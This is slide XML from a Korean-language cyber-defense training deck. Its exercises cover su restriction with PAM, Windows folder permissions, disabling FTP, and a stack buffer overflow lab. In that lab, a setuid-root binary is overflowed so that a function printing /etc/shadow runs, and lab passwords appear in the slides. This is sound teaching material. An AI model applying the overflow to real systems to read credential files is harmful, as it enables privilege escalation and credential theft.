          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6281892" y="3212200"/>
          <a:ext cx="4932807" cy="736346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1277954937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user_list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777403"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4378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vsftpd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user_list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파일은 설정에 따라 접속 허용 목록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(white list)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또는 접근 거부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(black list)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지정할 수 있음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11958"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC205F13-DB4D-47D5-980E-E30E80030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892" y="4506414"/>
            <a:ext cx="5005578" cy="56451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16F562-66DB-47A3-ABB9-C161B92AF74F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5529725"/>
            <a:ext cx="5616792" cy="95927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1) check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 및 키코드 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check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96027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FB783FB6-F004-4D8A-9A51-99B6118E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/Intro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교수소개</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4940BB54-D4E6-4689-9291-3F6BA3ACED57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7B7A31-846B-4771-92F1-9A2CB8A96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고려대학교 사이버국방학과 졸업</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>전문사관 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고려대학교 정보보호대학원</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>석사과정 재학</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4012923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/Training/Unit/Sys/5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 5.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계정 우회 접속 탐지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서버에 계정 우회 접속하여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 중인 사용자를 패킷 분석 도구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tshark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알아내고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su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제한하시오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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pP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접속 로그 파일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/var/log/secure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2)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su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 제한 설정 파일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pam.d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su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우회 접속을 탐지하고 대응 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(CentOS 6.4)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85792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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시스템 접속 로그 점검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tail /var/log/secure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 ※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>원격에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정 접속 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su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rgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>명령으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정으로 전환함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용 제한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pam.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>su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#auth required pam_wheel.so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>use_uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>#(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주석</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제거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477450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   * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>변경전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 * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>변경후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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다시 로그를 확인하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정 접속 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 전환되지 않음을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC385B03-C822-4C67-BC17-8209D9217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7" t="13865" r="713" b="3014"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547007" y="884701"/>
            <a:ext cx="4898572" cy="24399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F4C8086-E19B-462A-9CA8-459B472F8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809960"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="547578" y="3655169"/>
          <a:ext cx="4932807" cy="492506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357263476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tail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명령어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29298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tail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파일명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파일의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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마지막 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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kern="0" spc="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행</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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(line)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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출력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25299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47FCA47-A7D7-4F4B-8038-69A7D2A91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829667"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="550068" y="4174175"/>
          <a:ext cx="4932807" cy="492506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140904347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uid=0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27629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리눅스에서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계정은 관리자 권한을 가진다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167500"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0045126F-08FC-4771-9D61-6F89024891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5" b="49604"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391729" y="720992"/>
            <a:ext cx="4760686" cy="1360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46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A28C8146-D035-4A9C-813B-6469F9779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729" y="2370412"/>
            <a:ext cx="4780407" cy="111709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AC56F90-7683-44C6-8F22-DF14E7DE3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925839"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6392300" y="3599625"/>
          <a:ext cx="4932807" cy="1224026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3445345418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PAM (Pluggable Authentication Modules)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353260"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8442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레드햇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기반 리눅스에서 많은 프로그램이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PAM(Pluggable Authentication Modules)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이라는 중앙 인증 메커니즘을 사용하도록 구성된다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PAM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 플러그 가능한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(pluggable)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(modular)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아키텍처를 사용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관리자가 시스템에 대한 인증 정책을 설정할 때 유연성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(flexibility)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제공한다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201622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D254592-FBE8-4AAF-A7D8-B4F597D4E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383120"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="547578" y="5376141"/>
          <a:ext cx="4932807" cy="980186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2432235701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pam_wheel.so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236320"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6410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pam_wheel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모듈은 휠 그룹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(wheel group)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시행하는 데 사용된다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휠 그룹에 포함된 계정에 대한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사용을 허용한다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이름의 그룹이 없으면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그룹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즉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root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대상으로 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87017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175EE9C-5C2D-492B-B0BC-C2F0D9F2A36A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5242769"/>
            <a:ext cx="5616792" cy="124623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1) check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 및 키코드 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check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12789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/Training/Unit/Sys/6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 6.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파일 접근 권한 설정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내부 디렉토리를 특정한 사용자가 파일에 접근할 수 있도록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설정해 주는 것이 필요합니다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c\navy06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폴더에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Everyone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접근 권한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 권한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설정되어 있지 않습니다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귀하는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Everyone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접근 권한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 권한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모든 권한으로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부여하시오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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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administrator / 1q2w3e4r%%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 접근 권한을 설정할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Windows 2012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9904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26D91B7-44E7-48C7-9D14-B6D93A9AD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666" y="48777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75181C1-A909-4958-858C-729914937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37544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956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/Training/Unit/Sys/7</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 7.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FTP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서비스 설정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FTP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서비스는 계정과 패스워드가 암호화 되지 않은 채로 전송되므로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간단한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sniffer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의해서도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스니핑이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가능합니다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따라서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FTP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제한하는 것이 중요합니다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귀하는 현재 구동 중에 있는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FTP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중지시키시고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시작유형을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사용안함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으로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변경하시오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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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administrator / 1q2w3e4r%%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FTP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설정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할수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Windows 2012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48882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26D91B7-44E7-48C7-9D14-B6D93A9AD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666" y="48777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75181C1-A909-4958-858C-729914937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37544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0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/Training/Unit/Sys/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 8.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Buffer Overflow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공격 및 방어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/sec/bof64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파일에 존재하는 스택 버퍼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취약점을 이용하여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bar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함수가 실행되도록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pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B505F5E5-1AFC-4BE0-A2FB-19F018AC4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test / test123</a:t>
            </a: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1)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디스어셈블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objdump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-M intel -d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바이너리 파일 이름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취약점을 이용하여 복귀 주소를 조작할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버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1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취약점을 이용한 복귀 주소 조작에 대응할 수 있다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(CentOS 6.4)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47402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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리로 이동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cd /sec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2) /sec/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 속성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ls –l bof64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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소유자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 알 수 있음 ⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>권한으로 실행 가능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/sec/bof64.c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일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vim bof64.c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foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에서 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(BOF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>취약점을 가진 함수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 사용됨을 확인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※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일 내용을 출력</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함을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3) /sec/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 실행하여 힌트 획득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./bof64 AAAA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※ bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수의 시작 주소 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>: 0x0000000000400635 ⇒ BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>취약점 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>복귀 주소를 조작하면 </a:t>
            </a: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</a:rPr>
              <a:t>bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>함수 실행 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="10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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{727D84AA-90AB-4EB7-B278-E4DDF7459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55" y="1398059"/>
            <a:ext cx="403479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50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29D58818-0FB8-42B4-AB48-3554D6701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13" y="3047806"/>
            <a:ext cx="4989449" cy="281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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A528125-FF0A-4A9C-A648-6C05C1C390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367" b="56894"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318251" y="899528"/>
            <a:ext cx="2997200" cy="8802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39A5F22-DB43-4D03-88B5-651588C39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758689"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6301370" y="2457302"/>
          <a:ext cx="4932807" cy="3703407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236843578"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="28780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635548"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="33046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위에서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strcpy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실행 직후의 스택 구조는 다음과 같다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3985868"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38913" name="_x564967160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12EBF08F-9CBE-4E11-BC20-9429D8012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30" y="3075572"/>
            <a:ext cx="3552825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046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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disassemble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 $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -M intel -d bof64 | more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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점이 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수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버퍼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tmp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의 시작 주소가 </a:t>
            </a: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rbp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 - 16(0x10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A14AF77C-BB85-48EE-A741-3945FDC0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75" y="936036"/>
            <a:ext cx="5014341" cy="27857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56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E368D99-6D3F-4489-A11B-6A622DFC04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" b="35736"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497975" y="4108245"/>
            <a:ext cx="4947604" cy="20639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7E60104-4003-4ECA-892D-8CA49033E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6375"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6321475" y="461749"/>
          <a:ext cx="5340017" cy="5891961"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5340017">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="848009183"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="22330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454" marR="41454" marT="11461" marB="114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873759"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="565860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함수에서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foo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함수로 진입한 시점의 스택 구조는 다음과 같다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그러므로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버퍼의 크기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 더 긴 문자열을 넘기면 아래와 같이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함수로 복귀할 때 사용되는 주소를 변경시킬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454" marR="41454" marT="11461" marB="114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848564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45058" name="_x564918704">
            <a:extLst>
